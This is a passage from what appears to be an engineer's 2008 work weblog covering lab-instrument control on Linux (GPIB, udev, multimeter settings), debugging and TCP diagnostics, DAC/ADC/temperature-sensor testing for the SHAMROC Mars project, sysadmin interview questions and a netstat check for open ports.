On that CPU, you can just run Linux and with a driver you can read out your custom logic. The LEON3 CPU core has a SPARC instruction set, making it perfect for running Linux. The SPARC instruction set is a bit of a loner when it comes to embedded OSes though -- the ARM architecture is much better supported. But there you go.

The LEON3 is an alternative for an FPGA that's connected with a serial port or somesuch to a full-blown PC. It also makes it possible to move a lot of logic from the FPGA to C or C++ code. Although arguably you lose on simplicity (there's now a full OS running on the LEON core), you gain on flexibility because of the fluidity of software as opposed to an FPGA.

2008-12-19 Linux USB device handling

For reading/operating lab instruments like multimeters and power supplies, the GPIB standard is used. This standard defines the type of cabling and connection.

However, nowadays the interface cards for this bus are awkward to get and have been replaced by USB-based GPIB adapters like this one:

http://sine.ni.com/images/products/us/050318_gpib_usb_l.jpg

In this weblog entry, I'm going to explain the situation where you have a Linux machine and a USB device, but as an application developer you don't know how to continue from here. This is all explained using a USB-based GPIB adapter.

These particular devices are handled on Linux using the default gpib_common.ko kernel module and a device-specific driver which the manufacturer distributes (in this case the ni_usb_gpib.ko module).

However that's not the end of it. When the device is plugged in, it has to be connected to a device file like /dev/gpib0. This is done by loading the modules, loading the firmware (with some particular devices), running the gpib_config utility and setting the correct permissions on the device file.

We want this done automatically on our Debian machines. We already have compiled and repackaged the gpib_common.ko and ni_usb_gpib.ko modules, and have installed these.

First we need to know if the module will be loaded when we connect the device. The kernel handles loading appropriate modules by calling modprobe. Typing the following command can tell you whether modprobe knows what to do when such a device is connected. Replace the 'grep gpib' with 'less' if you don't know what string you're looking for.

 $ modprobe -c | grep gpib

If that's fine, then connecting the device should load the modules. Type the following command to check this, again replacing the 'grep gpib' with something more appropriate:

 $ lsmod | grep gpib

Connect the device and check for changes. If a device driver is loaded, then a udev rule should be written. If not, re-examine the output of the modprobe -c command. An example extract:

 $  modprobe -c | grep gpib
 ...
 alias usb:v3923p702Ad*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
 alias usb:v3923p709Bd*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
 ...

Observing one of those lines a bit closer:

 alias usb:v3923p702Ad*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
            ^^^^ ^^^^
 The vendor ID    The product ID

In my case, no driver got loaded, because the vendor and product numbers output by modprobe don't match the USB device's vendor and product numbers.

To see what the vendor and product numbers of the USB device are, type:

 $ lsusb
 ...
 Bus 007 Device 003: ID 3923:702b National Instruments Corp.
 ...

Check the string 1234:5678 just before the name of the device. The first part is the vendor number, the second part is the product number, both hexadecimal. As you can see, in this case the vendor number matches, but not the product number.

Add a new file in /etc/modprobe.d and then add a line in there which looks like the lines in the existing modprobe configuration. Adapt the vendor and product numbers as necessary. Then type lsmod and connect your device. Type lsmod again to see whether the appropriate driver loaded. If not, did you make a typo in the vendor or product numbers?

Now that the driver is loaded, we go on to writing udev rules. Check the Writing udev rules document for this.

Some tips for writing udev rules follow.

First you find the device details using:

 $ find /sys -name dev  | grep usb

Find the device's path in /sys and use it with udevinfo. Note that some devices require firmware to be loaded; udevinfo will then not show a lot of information, and the device must be identified purely by its product and vendor ID.

 $ udevinfo -a -p /sys/class/usb_device/usbdev2.18/dev

Before you plug/unplug the device, run the udev monitor to see what events are fired off:

 $ udevmonitor

To test whether your rule fires off, use logger in your udev rule:

 SUBSYSTEM=="usb", DRIVERS=="usb", ATTRS{idVendor}=="3923",
   ATTRS{idProduct}=="709b", ACTION=="add",
   RUN+="/usr/bin/logger My rule fires off!"

Note that the above line is actually ONE line, without any linefeeds except at the end.

When you want to load firmware upon connecting the USB device, you might need to pass the location of the device to the firmware loader. It's possible to use the value of sysfs attributes in your RUN or PROGRAM part of the udev rule:

 SUBSYSTEM=="usb", DRIVERS=="usb", ATTRS{idVendor}=="3923",
   ATTRS{idProduct}=="702b", ACTION=="add",
   RUN+="/usr/bin/logger Running /usr/sbin/gpib_config for device
   USB-GPIB-B on bus %s{busnum}, device %s{devnum}"

The %s{...} is substituted with the value of a particular sysfs attribute.

2008-12-09 Offset dependency

Last year, I wrote about the Fiske steps routine, a routine which automatically searches for an optimum sensor setting.

For this routine to work, the setting and reading back of voltages and currents has to be very precise. Thus, a 'measure offsets' routine was also developed, but it turns out this routine is going to be a bit more complicated than expected.

Here's an image of the output of the Fiske steps routine:
fiske example.png

We had a hard time today getting the routine to work nicely. The physics student told us that it has something to do with the fact that the FFO voltage depends primarily on the FFO bias current, but to a much lesser degree also on the FFO control line.

Some background on this: the sensor behaves as a resistor, so setting a particular FFO bias current directly relates to the resulting FFO voltage. This relation becomes somewhat less simple when the FFO control line is set. The control line has two influences: running a current creates a magnetic field, and because the copper line at the back of the sensor substrate acts as a resistor, a little heat is given off.

The heating makes the offset somewhat different and should be taken into account. Also, there's timing involved: after setting the FFO CL to zero following a high setting, the FFO voltage can be seen slowly dropping from near zero to zero.

2008-11-21 Temperature sensor versus PT1000

One of the tests we do on the temperature sensing ASIC is to measure the difference between the device and a PT1000.

A number of samples is taken from both, and on the resulting two arrays we do a first-order fit. The offset should be 0 and the gain should be 1; otherwise an error has crept into one of them. We repeat this procedure for each ASIC sample.
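
With NumPy this check is essentially a one-line fit. A sketch, with arbitrary tolerances:

 import numpy as np

 def check_against_pt1000(asic, pt1000, tol_gain=0.01, tol_offset=0.05):
     """First-order fit of ASIC readings against PT1000 readings."""
     gain, offset = np.polyfit(pt1000, asic, 1)
     ok = abs(gain - 1.0) < tol_gain and abs(offset) < tol_offset
     return gain, offset, ok

 # two fake, nearly identical measurement arrays
 pt1000 = np.linspace(70.0, 300.0, 50)
 asic = pt1000 * 1.001 + 0.02
 print(check_against_pt1000(asic, pt1000))   # gain ~1.001, offset ~0.02, True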

2008-11-04 Bitstream mode

The new project's temperature sensor (tsens) ASIC is basically a delta-sigma analog-to-digital converter. What it comes down to is that the ASIC measures temperature differences as a 1-bit stream. Through calculations, a temperature comes out, but that raw 1-bit stream can still be read out for verification purposes.

For the coming radiation test, we'll read out lots of things and among them we will be reading out the raw stream of bits.

The FPGA needs to be set in a particular mode for this:

  • Set the drdy_select register to the appropriate socket (the board is outfitted with two sockets, to test two ASICs)
  • Make the buffer for the bitstream empty by setting the buffer_flush register to 1
  • Set the sequencer_mode register to 2, which means bitstream mode
  • Set the buffer_pktsize register to 4, which means that we want four 32-bit words when we read out the buffer
  • Set the bs_mode register to the appropriate socket which starts the measurement

When this is done, the buffer_read register needs to be read out regularly to make sure the buffer doesn't overflow. Each read-out of the buffer now returns four 32-bit words.

Now it's a given that the time for measurements after radiation is very short since the samples can't be out of the radiation too long (otherwise you invalidate the test). Thus we have 60 seconds to do a measurement.

Each second, the tsens measures for 0.1 second, producing 8222 bits; for the rest of the second it stops measuring and we can read out the buffer. Reading for 64 seconds thus yields 64 x 8222 bits, which is 16444 32-bit words. With a buffer packet size of four 32-bit words, that means 4111 read-outs of 128 bits each.
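
The arithmetic as a quick sanity check:

 bits_per_second = 8222                    # one 0.1 s burst per second
 seconds = 64
 words = bits_per_second * seconds // 32   # 32-bit words in the buffer
 reads = words // 4                        # buffer_pktsize = 4 words per read
 print(words, reads)                       # 16444 words, 4111 reads of 128 bits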

A nice thing about the buffer is that it's so big: a whole whopping megabyte is reserved just for the bitstream that comes out of the temperature sensor. If you don't want to disturb the process with communications from the PC, then just let the buffer fill up, wait for a minute and retrieve the whole buffer in one fell swoop.

2008-10-17 adding a logfile

My thought was: adding a logfile to our software within half an hour should be doable. So let's give it a shot!

The server has a debug macro, so obviously it'd be easiest to add it there. The macro expands to a call to a singleton, which emits a Qt signal. It's caught by a class which, among other things, writes this stuff to the screen.

That was the first idea, but it turns out someone already made a start using syslog. Before the signal is emitted, I also added a line to write it to syslog.

Update: turns out that's a little shortsighted. I'd like to coin a new law that states that there's always more work involved than you think:

  • Removing useless stuff like date/timestamp, which is added by syslog
  • Mapping our internal log levels to the syslog priority levels

2008-10-16 analyzing a running process

Today I was notified that our custom-developed lab software suite had crashed.

Having a look, it turned out that it hadn't crashed; top showed that it was in fact using 100% CPU time.

First I did an strace on the process, which showed hundreds of lines looking like:

 clock_gettime(CLOCK_MONOTONIC, {836478, 309454188}) = 0
 clock_gettime(CLOCK_MONOTONIC, {836478, 311665927}) = 0
 clock_gettime(CLOCK_MONOTONIC, {836478, 313925541}) = 0

Then I decided to get a stacktrace from the process using gdb:

 labbox1:~$ gdb --pid=17732
 (gdb) bt
 #0  0xb75b3e5d in memset () from /lib/tls/libc.so.6
 #1  0x084dad4a in QTextEngine::LayoutData::reallocate ()
 #2  0x084de989 in QTextEngine::attributes ()
 #3  0x084e8c33 in QTextLine::layout_helper ()
 #4  0x084ea124 in QTextLine::setLineWidth ()
 #5  0x085211e5 in QTextDocumentLayoutPrivate::layoutBlock ()
 #6  0x08527825 in QTextDocumentLayoutPrivate::layoutFlow ()
 #7  0x0852544f in QTextDocumentLayoutPrivate::layoutFrame ()
 #8  0x08525910 in QTextDocumentLayoutPrivate::layoutFrame ()
 #9  0x08525b6c in QTextDocumentLayout::doLayout ()
 #10 0x08525c10 in QTextDocumentLayoutPrivate::ensureLayoutedByPosition ()
 #11 0x08525c98 in QTextDocumentLayout::blockBoundingRect ()
 #12 0x0852ccb6 in QTextCursorPrivate::blockLayout ()
 #13 0x0852ea62 in QTextCursorPrivate::setX ()
 #14 0x0853289d in QTextCursor::deleteChar ()
 #15 0x080b7fe8 in ScriptWindow::showOutput () at src/Debug.cpp:50
 #16 0x080b846f in ScriptWindow::runOutput () at src/Debug.cpp:50
 #17 0x0810afd9 in ScriptWindow::qt_metacall (this=0x8fcc560,
     _c=QMetaObject::InvokeMetaMethod, _id=48, _a=0xbfd419c8)
     at src/moc_Windows.cpp:248
 #18 0x08a14892 in QMetaObject::activate ()
 #19 0x08a14f54 in QMetaObject::activate ()
 #20 0x089a4786 in QProcess::readyReadStandardOutput ()
 #21 0x089a94db in QProcessPrivate::_q_canReadStandardOutput ()
 #22 0x089a997e in QProcess::qt_metacall ()
 #23 0x08a14892 in QMetaObject::activate ()
 #24 0x08a14f54 in QMetaObject::activate ()
 #25 0x08a31b61 in QSocketNotifier::activated ()
 #26 0x08a1a90f in QSocketNotifier::event ()
 #27 0x0832426f in QApplicationPrivate::notify_helper ()
 #28 0x083296b9 in QApplication::notify ()
 #29 0x08a00097 in QCoreApplication::notifyInternal ()
 #30 0x08a258dd in socketNotifierSourceDispatch ()
 #31 0xb78c1731 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
 #32 0xb78c47a6 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
 #33 0xb78c4d27 in g_main_context_iteration () from /usr/lib/libglib-2.0.so.0
 #34 0x08a25a38 in QEventDispatcherGlib::processEvents ()
 #35 0x083a9665 in QGuiEventDispatcherGlib::processEvents ()
 #36 0x089ff0fd in QEventLoop::processEvents ()
 #37 0x089ff37d in QEventLoop::exec ()
 #38 0x08a014e2 in QCoreApplication::exec ()
 #39 0x083249d7 in QApplication::exec ()
 #40 0x0805d809 in main ()

After the weekend, we'll analyze this at our leisure but if anyone has helpful comments, let me know.

Update: today I saw that Debian Package of the Day highlighted memstat which is a tool displaying virtual memory usage. Pity I didn't know this earlier, since it looks really useful.

2008-10-09 Reading out a multimeter part 2

Again busy with the HP 3458A multimeter. The electronics guy suspected that the default settings were actually getting more accurate measurements than our scripts were getting.

The default settings are:

 NPLC 10.000000
 FUNC 1, .1
 APER 0.200000
 RES -1.000000
 LINE 49.985386
 NRDGS 1, 1
 RANGE .1

The above are all functions that influence the measurement accuracy. Some confirm each other: for instance, the NPLC (Number of Power Line Cycles) setting says that we take one measurement every 10 power line cycles (at 50 Hz, as the LINE setting says), i.e. one sample per 0.2 seconds. That's exactly what the APERture setting displays.

Then we have the RANGE setting of 0.1 volts, which is what the second result of the FUNC setting says. So that's good too. What's funny, though, is the result of the RESolution setting, which returns a negative number. Will look into that later.

After talking to our electronics guy, he mentioned that yes, he could pass these settings to the script, but something was still wrong. After the script ended, the multimeter would display a faster measurement rate than before the script.

The problem here is that we end the script with the PRESET NORM command. The PRESET command can set the multimeter to one of three predefined states. Useful, since you have something to turn back to. Unfortunately, the power-on state isn't one of them. Turns out that's a separate command, the RESET command. OK, so that's fixed.

Next problem: when any script ends, the panel of the multimeter is locked out. Not even the RESET command fixes that. Turns out that's pretty easy: the Unlock button at the front of the meter.

After that, another problem cropped up: of the ten measurements, I got back a variable number of them, anywhere between zero and seven. It probably has something to do with the way the EOI setting is done.

This was not fixable by using the EOI setting although it seemed that way for a while. In this case I found the problem (but not the cause) by sending the ERRSTR? command, where the error was TRIGGER TOO FAST.

The manual says here that the interval from one reading to the next is specified by the SWEEP command. Funny thing is, with an aperture of 0.2 seconds and, say, 10 points, an interval time of somewhat more than two seconds should be enough. But when such a setting is made, the measurement takes up to 20 seconds and no values are actually returned.

I reverted the EOI setting back to 0, and now all the requested measurements are returned. The error TRIGGER TOO FAST is still returned though, and I don't trust the measurements as a consequence. As a workaround, we're now doing one measurement point, which doesn't trigger the error.

Update: after looking at this with a colleague, the issue turns out to be the following. There are two ways to end a reading: through a character such as \n (line feed), or through setting the EOI line high. The first way was being used incorrectly. This caused measurements to be returned while reading simple commands like 'ERRSTR?'. Once that was fixed, simple commands like ERRSTR? were working.

However, it stops working when you request readings in binary format. That format might include that particular character, and that's what was causing the early termination of readings.

That's all fine and dandy, but we don't want ASCII transmission of measurements -- we need the binary format since that makes the measurements faster. Roughly, taking a two-second measurement will take six seconds when taking the ASCII route.

This could be fixed by using the EOI line for binary readings. The command END can take care of this; requesting END? results in setting 2. This means: for multiple readings, the EOI line is set true when all measurements have been sent.

Combined this can work as follows:

  1. Open the GPIB device, set the EOS (End-Of-String) to \n
  2. Do some initialization
  3. Before requesting multiple measurements, disable the termination of reads when receiving the EOS (instead rely on the EOI line set high)
  4. After receiving the measurements, enable the EOS again and continue on merry way

Update 2: in the end, we fixed it another way. Instead of letting the read call stop automatically when an EOS character comes by, we just calculate the number of bytes to read. Then do a read call exactly for those. After eliminating the SWEEP command, we also eliminated the TRIGGER TOO FAST error! Hurray!
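
Sketched in Python, such a byte-counting read looks something like this (the reading size and the device object are placeholders; the real code goes through the GPIB driver):

 BYTES_PER_READING = 8        # assumed size of one binary reading

 def read_exact(dev, nbytes):
     """Read exactly nbytes, ignoring any EOS characters in the data."""
     buf = b""
     while len(buf) < nbytes:
         chunk = dev.read(nbytes - len(buf))
         if not chunk:
             raise IOError("short read from GPIB device")
         buf += chunk
     return buf

 def read_measurements(dev, count):
     return read_exact(dev, count * BYTES_PER_READING)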

Also found out that the RES (resolution) setting returns -1 because it's determined automatically from the NPLC setting.

2008-10-03 Software architecture decisions

Today I bumped into a problem which required some decisions about the software. In short it comes down to the following.

We have control scripts (in Perl) which fire off Command Packets to the server. The server is connected to multiple daemons which handle tasks. When receiving a Command Packet, the server broadcasts it to all daemons.

When the daemon replies with a Response Packet, the server broadcasts these to all connected scripts.

Problem is, that broadcast isn't always useful. There could be multiple scripts giving off commands, and all responses are broadcast. Thus it could be that scripts receive the wrong answer.

Now a solution for this:

  • Create a special packet
  • Eliminate the first broadcast for the new packets
  • Eliminate the second (response) broadcast for the new packets

After some hacking, what remains is the return packet. It shouldn't be broadcast, but the tree of classes seems to point to itself again. Could this be the Friday evening effect?!

Update: partly, it was the Friday evening effect. What was happening is that the return packet is not broadcast, but instead is neatly redirected back to the sending Connection object.

Currently, the Perl library uses a number within the packet to determine what to do with it: the APID (APplication IDentification). However, this APID comes in two types, a hardware and a software APID. Packets with a hardware APID are passed by the daemons straight to the connected hardware, and they are currently used for binary data, not ASCII. The software APID is unique per daemon. Thus, sending a packet needs to include the daemon's software APID.

New planning:

  • Include the software APID when sending packets from the Perl scripts
  • When the response is sent from the daemon, the software APID needs to be set in the response packet.
  • When the response is received in the Perl library, we need to know that when a software APID is present, the packet contents need to be treated in another way
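
A sketch of how that could look from the Perl side. The packet layout and the helper functions (send_packet, receive_packet, is_software_apid and the two handlers) are made up for illustration; they are not the real library API.

  # Hypothetical helpers; only the APID concept is real.
  send_packet({
      apid => $daemon_sw_apid,    # software APID of the target daemon
      data => $command,
  });

  my $response = receive_packet();
  if (is_software_apid($response->{apid})) {
      handle_ascii_reply($response->{data});    # daemon/server reply
  } else {
      handle_binary_data($response->{data});    # hardware APID: raw binary
  }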

Some important things to remember about this architecture:

  • There is not one single place which maps a particular request to a particular response -- thus it's possible to send packets with one APID, and have the response contain another
  • It's implicit that a request packet triggers a broadcasted response
  • When something else than a hardware APID is sent, the server assumes the packet is meant for the server itself
  • A packet for the server is in the form of two integers, a command and a value (an example of this is the setting of timeouts)

2008-09-22 Reading out a multimeter

We'd like to test the DAC board by reading it out with an HP 3458A multimeter (now Agilent, but this is a pre-spinoff model). It's attached through a GPIB interface to the PC we're running our software on.

hp 3458a.jpg

Currently, we've got some Perl scripts that were used in a previous project. However, we want long integration times for accurate measurements, and the current Perl code doesn't allow this.

The current situation is as follows. The multimeter has a trigger arm event (command TARM), a trigger event (command TRIG) and a sample event (several commands). Normally, all are set to AUTO and the display of the meter shows continuously updating readings. The current code sets TRIG to SYN, which means 'make a reading when GPIB commands you to do so'. Then it does some other setup and, before making a reading, sets TRIG to SGL, which means 'do one measurement, then disable readings'.

The resolution is set more or less automatically because a range (1.2 V) is passed when selecting DC voltage measurement. The SWEEP command is then used to take any number of samples.

But now we want to have long sampling times.

The existing solution was to use the APER command (aperture), which takes a value between 0 and 1 second, specified in 100 ns steps.

Since we wanted longer measurement times, we'd use the NPLC command. NPLC stands for 'Number of Power Line Cycles'. This is useful since measuring for a whole cycle will reduce noise from the incoming power line.

In The Netherlands, the power from the wall socket has a frequency of 50 Hz. Thus if we want to measure for 100 cycles, we'd measure for two seconds.
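
The arithmetic is simple enough to pin down in a few lines (a sketch, assuming 50 Hz mains):

  my $mains_hz = 50;                   # Dutch wall socket frequency
  my $nplc     = 100;                  # number of power line cycles
  my $seconds  = $nplc / $mains_hz;    # 100 / 50 = 2 seconds per reading
  printf "NPLC %d at %d Hz: %.1f s per reading\n",
         $nplc, $mains_hz, $seconds;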

Funny thing is, that's not what the script does. There are a number of set-up steps before the measurement is taken and I'd like to eliminate those (or at least, move them to the initialization phase).

There's for instance the RATIO command, which is set to OFF. This command measures both your signal and a reference voltage, then returns the ratio of the two. We don't need this, and OFF is the default setting anyway, so I eliminated this command from the script.

To find out whether the ratio setting really defaulted to OFF, I tried to read the setting back from the multimeter. This worked, but besides the setting I received a load of garbage as well. I'd like to find out why that happens.

2008-09-16 Tweaking TCP

For the Telis project, we use the TCP protocol for the radio uplink. This is rather unusual since most other balloon flight projects use UDP and use their own retransmission and sequencing algorithms.

It has worked well for us previously, but we want to have more insight and diagnostics in a flight situation. Also, there's a backup function present in the software that's running on the PC104 on the balloon. Normally, it's not switched on and we'd like to automatically switch it on when a transmission occurs.

To gain more insight into the quality of the radio uplink, we think iptraf will do fine. A screenshot with the detailed statistics for an interface:

 - Statistics for eth0 ---------------------------
                Total      Total    Incoming   Incoming    Outgoing   Outgoing
              Packets      Bytes     Packets      Bytes     Packets      Bytes
  Total:         3142     621643        1665     131825        1477     489818
  IP:            3142     577645        1665     108505        1477     469140
  TCP:           2903     548408        1434      79900        1469     468508
  UDP:            238      29201         230      28569           8        632
  ICMP:             0          0           0          0           0          0
  Other IP:         1         36           1         36           0          0
  Non-IP:           0          0           0          0           0          0
  Total rates:         51.7 kbits/sec        Broadcast packets:          222
                       30.4 packets/sec      Broadcast bytes:          31189
  Incoming rates:       9.2 kbits/sec
                       15.8 packets/sec
                                             IP checksum errors:           0
  Outgoing rates:      42.5 kbits/sec
                       14.6 packets/sec

Note the IP checksum errors. This one would be pretty interesting for us.

Now what we probably also want is a way to find out how many resends will occur if the radio uplink temporarily fails. We'd probably want to be gentle and not resend too much, since the uplink is pretty limited bandwidth-wise. I have found a way to check this per application (man tcp, search for TCP_INFO) but not per interface.
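
For what it's worth, here's a sketch of that per-socket check in Perl. The TCP_INFO constant value and the struct layout come from linux/tcp.h and are Linux-specific; treat the unpack as illustrative, since the kernel struct can grow between versions.

  use Socket qw(IPPROTO_TCP);
  use constant TCP_INFO => 11;   # from linux/tcp.h, Linux-specific

  # $sock is an established TCP socket, e.g. the uplink connection.
  my $info = getsockopt($sock, IPPROTO_TCP, TCP_INFO)
      or die "getsockopt: $!";

  # struct tcp_info starts with a series of u8 fields; the third
  # one is tcpi_retransmits.
  my ($state, $ca_state, $retransmits) = unpack("C3", $info);
  print "current retransmit count: $retransmits\n";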

A nice thing to use for testing purposes is Netem, the Linux in-kernel packet mangling software.

2008-08-29 Fighting an ADC

We use an ADC from Cirrus Logic on the DAC board. It's there to check the requirements for noise and linearity of the DAC (and subDACs).

It's the same ADC that we used in the Telis project. It's a nice piece of work, very accurate. For Telis it was used to measure in the hundreds of nanovolts.

dac board adc.jpg

On the DAC board however, there seem to be problems with linearity. Around zero volts, it seems to jump up and down a little. It wasn't just this sample; the ADC was lifted off the board and replaced with another -- the same problem was seen.

The gain on the ADC was lowered and the effect was still seen in the same way, so it's not the DAC that's causing the trouble. This indicates that the ADC or its placement on the board is the problem.

It's probably the latter, since with Telis it worked wonderfully. That isn't conclusive though, because back then the voltage around zero was looked at, but not very carefully.

What we'll now do is firstly use external measurement equipment and secondly, fire off an e-mail to Cirrus Logic support.

Another problem is that the ADC now gives off some REAL funny numbers after some changes in the FPGA. After a full day of analysis with three people (software engineer, FPGA engineer and analogue designer), we came to the conclusion that... the power must be shut down. You'll ask why this wasn't done right away. We did -- except the command that powers off the digital and analogue parts of the board does NOT affect the power of the ADC... That was one of the requirements.

However it remains to be seen whether this fixes the problem of non-linearity around zero.

2008-08-12 Configuring an ADC

On the DAC board, for testing purposes, a Cirrus Logic ADC is present.

It's the same ADC as used in another project. These babies are pretty well-versed feature-wise, as far as my experience goes anyway. The one we use (CS5534) has four channels, each with its own configuration registers for selecting measurement time, range, offset enabling, offset registers, et cetera.

What's different here is the FPGA in between the software and the ADC. In the previous project, I'd just write the configuration register for a certain voltage range and kick off a macro contained in the FPGA flash. Read back results and voilà.

Occasionally, I'd do those detailed steps in a script and the steps would be:

  • Set voltage range
  • Set measurement time
  • Wait for results
  • Read back results and convert
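
In script form, those steps might look something like the sketch below. The register helpers, register names and flag constants are hypothetical stand-ins for the project's own register-access layer; only the order of the steps is the point.

  # Everything named here is a hypothetical stand-in.
  write_reg('adc_config', $RANGE_100MV | $WORDRATE_15HZ);  # range + measurement time
  start_conversion();
  sleep 1 until conversion_done();        # wait for results
  my $raw   = read_reg('adc_result');     # read back the raw sample
  my $volts = convert($raw);              # and convert it to volts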

Currently, it's a bit simpler: just read out and convert.

2008-08-07 Controlling individual DACs

I've written previously about the DAC board, but mainly looking at it as a black box. Now it's time to look at the inner workings.

We perform two tests on the DAC: noise measurements and linearity. The complete range of the DAC is actually covered by five small DACs inside the package, each with a 7-bit range. Normally we just control the main DAC and let the FPGA/DAC combo figure out what happens next, but when the noise and/or linearity tests don't measure up to expectations, we need to look further.

That's why there's a special override register that can be enabled (set to 1) which allows us to control the five small DACs directly. This is done through two 32-bit registers, in a kind of funny way:

The first register, called testd1, holds bits 19 to 0 of the table below; register testd2 holds bits 34 to 20. The highest bit is the most significant bit (MSB).

  bit  meaning
  34   Bit 7 (MSB), DAC 1
  33   Bit 7 (MSB), DAC 2
  32   Bit 7 (MSB), DAC 3
  31   Bit 7 (MSB), DAC 4
  30   Bit 7 (MSB), DAC 5
  29   Bit 6, DAC 1
  28   Bit 6, DAC 2
  27   Bit 6, DAC 3
  26   Bit 6, DAC 4
  25   Bit 6, DAC 5
  24   Bit 5, DAC 1
  23   Bit 5, DAC 2
  22   Bit 5, DAC 3
  21   Bit 5, DAC 4
  20   Bit 5, DAC 5
  ...  ...
  1    Bit 1 (LSB), DAC 4
  0    Bit 1 (LSB), DAC 5

Et cetera. Note the interleaving of bits. Since testers use scripts for this, we need to create a simple function which makes it easy to control the DACs separately.

In the end, I created a function which does the following:

  • Retrieves the current registers
  • Turns the user-requested value into a binary string of ones and zeroes
  • For each bit of the new value, the corresponding register bit is updated
  • When done, the registers are written and activated
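
In Perl, a sketch of that function could look as follows. The bit position follows from the table above: for sub-DAC d (1 to 5) and value bit b (1 = LSB, 7 = MSB), the register bit index is (b-1)*5 + (5-d). The read_reg and write_reg helpers are hypothetical stand-ins for the real register access.

  # A sketch; read_reg() and write_reg() are hypothetical stand-ins.
  sub set_subdac {
      my ($dac, $value) = @_;           # $dac is 1..5, $value is 0..127
      die "DAC number out of range" if $dac < 1   || $dac > 5;
      die "DAC value out of range"  if $value < 0 || $value > 127;

      # Combine testd1 (bits 19..0) and testd2 (bits 34..20) into one
      # 35-bit word; fine on a 64-bit Perl build.
      my $word = (read_reg('testd2') << 20) | read_reg('testd1');

      for my $bit (1 .. 7) {            # bit 1 is the LSB, bit 7 the MSB
          my $pos = ($bit - 1) * 5 + (5 - $dac);  # interleaved position
          if ($value & (1 << ($bit - 1))) {
              $word |= 1 << $pos;
          } else {
              $word &= ~(1 << $pos);
          }
      }

      write_reg('testd1', $word & 0xFFFFF);         # lower 20 bits
      write_reg('testd2', ($word >> 20) & 0x7FFF);  # upper 15 bits
  }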

2008-07-01 testing temperatures

Today I configured the housekeeping feature of our Generic EGSE software (stands for Electrical Ground Support Equipment) and added a couple of temperature sensors from the DAC board. I then configured the software to plot the requested values over time; see below.

temp dac.png

Then we sprayed the sensor with Cold Spray and watched the strip chart dive:

temp dac2.png

Time to show our setup:

IMAGE 497.jpg

2008-06-26 Layout Shamroc board

Below are details of the Shamroc DAC testing board.

IMAGE 496.jpg

  1. Daughterboard, for DAC 1 (DAC not present yet)
  2. Daughterboard, for DAC 2 (daughterboard not present yet)
  3. Filtering, plus the high-accuracy ADC is here as well (which measures back whatever the DACs set)
  4. Reference power
  5. Controlling of heaters
  6. Two housekeeping ADCs, with lower accuracy than the one that's located at 3
  7. Power for DACs and filtering
  8. Power supplies
  9. Additional input for power
  10. Barrier
  11. Additional clock input for DACs
  12. Connection from FPGA
  13. Connection from FPGA for the DAC clock signal (40 MHz)
  14. Output DACs
  15. Output reference power

Interesting stuff:

  • If the clock coming from the FPGA doesn't live up to our expectations during testing, we can use another source and hang it on the connectors marked by 11.
  • The clock from the FPGA is slightly set apart from the bigger data connection, because the harmonics from that 40 MHz signal have a higher chance of interfering with the data lines. Note that at a later time, we'll have a 1 Hz synchronization pulse coming in from outside. This is because our electronics are only part of the whole system and there must be a system-wide clock as well. Otherwise our clocks would deviate as time progresses (think days here).
  • There's another clock coming in at 1.25 MHz for the housekeeping ADCs, on the wide ribbon.
  • The input marked with 9 is there to test the stability of the DACs. We can feed in funny signals and this shouldn't influence the output of the DACs, marked with 14.

2008-06-23 Shamroc DAC board

The DAC testboard for the Shamroc (part of Exomars) project is now under test. This board is meant to test the extremely stable DACs that the project needs. The stability is necessary because the DACs will control the seismometer, which in turn needs very long measurement times. The accuracy of the DACs will thus directly influence the measurements.

Here is a good presentation on the seismometer itself: 9_Smit_GEP-SEIS.pdf

The image below is the test configuration of the seismometer.

seis.jpg

After reading the documentation, I personally was left with a bunch of questions. An appointment tomorrow will change all that.

Questions from a software engineer:

  • What is meant by 'very broad band' seismometers?
  • What is meant by 'seismometers in opposite sensing directions'? Is there a direct relation between the number of ADCs and sensing directions? If so, don't these ADCs have channels for that?
  • Does the GEP-Sphere (the package with the seismometers) contain everything for all directions? How many sensing directions are there?
  • How is the sensitivity compared to earth models?
  • Why is the instrument noise dominated by electronic noise?
  • How should the performance requirements be read?
  • Explanation of the subsystems in the ASIC
  • Why are commercial 24-bit ADCs not really 24 bits? Are we just measuring noise on those highest-accuracy bits? Why? Couldn't we cool it?
  • Why is 1/f electronic noise (pink noise) the biggest problem?

Update following soon.

2008-06-19 Project SHAMROC

For project SHAMROC, part of the Exomars mission, the testing will start next week.

shamroc dac bord.jpg

This project develops mixed-signal ASICs which have DAC, ADC and temperature sensing functions and the first prototypes will arrive next week. I say prototypes, plural, since the functions are divided onto several ASICs for now. Later, these functions will be integrated on a single die.

This is exciting stuff. These electronics have to conform to the highest demands. Since we're talking about a Mars mission, the ASICs will have to operate in extreme temperatures. The weight has to be as low as possible, and the limits on energy consumption force us to use a minimal number of components. And because of the conditions during the trip, as well as the conditions on Mars, the components have to be radiation-hard.

When the ASICs arrive, the software group has a generic workbench for testing them. We'll then work together with the electronics guys to make solid, reproducible tests.

2008-05-31 Test for a sysadmin

As part of an interview for a new system administrator, we asked the following questions:

General:

  • Background?
  • With which Unix-like systems have you had experience?
  • How many machines or users?
  • Can you name some control panels? Which one have you supported?

Administration:

  • Which filesystem does Linux use?
  • What is journalling?
  • What's an inode?
  • What happens when you delete a file while an application has it opened?
  • What is: NFS? NIS?
  • What is Kerberos?
  • Which webserver do you have experience with?
  • What is a wildcard DNS entry? How would you configure Apache for that?

Network:

  • Do you know how to tunnel traffic?
  • Do you know what OSI layers are?
  • Where does TCP fit in?
  • What is ICMP? Where does it fit in?

Network above layer 4:

  • What is SMTP?
  • What's the difference between IMAP and POP3?
  • Why are both protocols insecure? How to handle this?
  • What's DNS?
  • Did you administrate DNS servers?
  • What does it mean when a server is authoritative for a domain?
  • How do you look up the name servers for a domain?
  • What are virtual hosts in the HTTP protocol?

Network layer 4 and below:

  • What's the difference between UDP and TCP?
  • What's a gateway?
  • What's a multi-homed machine?
  • If there are two network interfaces on a machine, how many IP addresses can you use?

Security:

  • How do you stay up-to-date on security news?
  • How do you check for open ports?
  • What is jailing?
  • What is selinux?
  • When is a firewall called for, in your opinion?
  • How would you go about setting up a firewall?
  • What is intrusion detection?

2008-05-25 Finding open ports

When tightening up security on a Linux server, one of the first things the system administrator does is find out which ports are open. In other words, which applications are listening on a port that is reachable from the network and/or internet.

We'll use netstat for this purpose. On a prompt, type:

  $ sudo netstat --tcp --listen -p

